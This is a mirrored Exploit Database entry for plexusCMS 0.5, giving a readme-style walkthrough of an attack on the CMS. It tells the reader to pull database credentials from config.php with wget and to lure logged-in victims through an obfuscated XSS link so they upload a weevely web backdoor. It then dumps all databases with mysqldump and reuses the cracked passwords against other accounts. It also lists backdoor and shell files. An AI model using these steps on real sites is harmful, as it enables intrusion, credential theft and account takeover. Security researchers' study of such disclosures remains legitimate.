plexusCMS 0.5 – Cross-Site Scripting / Remote Shell / Credentials Leak

• Exploit Database
• 124 阅读

• 作者： neglomaniac
  日期： 2014-03-31
• 类别：

  • remote
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/32618/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76

  # Exploit Title: plexusCMS 0.5 XSS Remote Shell Exploit # Google Dork: allinurl: plx-storage # Date: 22.02.2013 # Exploit Author: neglomaniac # Vendor Homepage: http://plexus-cms.org/ # Version: 0.5   ---   FILES   backdoor.php simple commend execute backdoor commands.txt list of useful commands for owning remote box generator.py create important files with given parameters phpinfo.php simple phpinfo call for testing plexus05.tgz original plexus source code for auditing postit.py send evil POST Request for file upload readme.txt nothing else than this file request.txt evil POST request template for postit.py weevely.php weevely shell with password:secret weevely.tgz weevely stealth web backdoor client and generator   ---   EXPLOITATION   Get database credentials with wget http://RHOST/plx-file/config.php   Try to log in with phpmyadmin and dump the database for password cracking. If you can crack the password you can upload php files with new image and new file. You can launch your php backdoors inside http://plexushost/plx-storage/files/ or plx-storage/images/   If you do not have access to the database in some way you can upload files with XSS and Social Engineering.   Set up a server with php support and python installed on it. Copy all this files to a location where you can write to it. Launch   python generator.py plexushost 80 http://yourserver/scripts/ weevely.php   If you see: plximage.php, plximage.js, plximage.xss generated!!! all files are generated for exploitation.   plexushost is the victim webserver where plexus is installed port is the standard webserver port   http://yourserver/scripts/ is the location of exploit files. Do not forget the slash at the end!!!   weevely.php ist the file uploaded at http://victimhost/plx-storage/files/   Get url from plximage.xss obfuscate, iframe and/or shorten it. Put it into an email, on a webpage or wherever you want.   Socialengineer your victim to open this url. If your victim is logged in you get your backdoor at: http://victimhost/plx-storage/files/ Else you need to socialengineer your victim to log in. After the victim logs in you get your backdoor at files directory.   Connect to your backdoor with weevely and password your password (secret) python weevely.py http://victimhost/plx-storage/files/yourfile.php secret   Dumpt the whole database with previous collected credential and download ist mysqldump -f -r plxinfo.txt -uYOURUSER -pYOURPASS --all-databases wget http://RHOST/plx-storage/files/plxinfo.txt   Crack password and use it for your next hacking attempts against your victim. For example try this password for root or other users, other mysql databases, mysql root, facebook/twitter accounts and so on.   ---     Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32618.tgz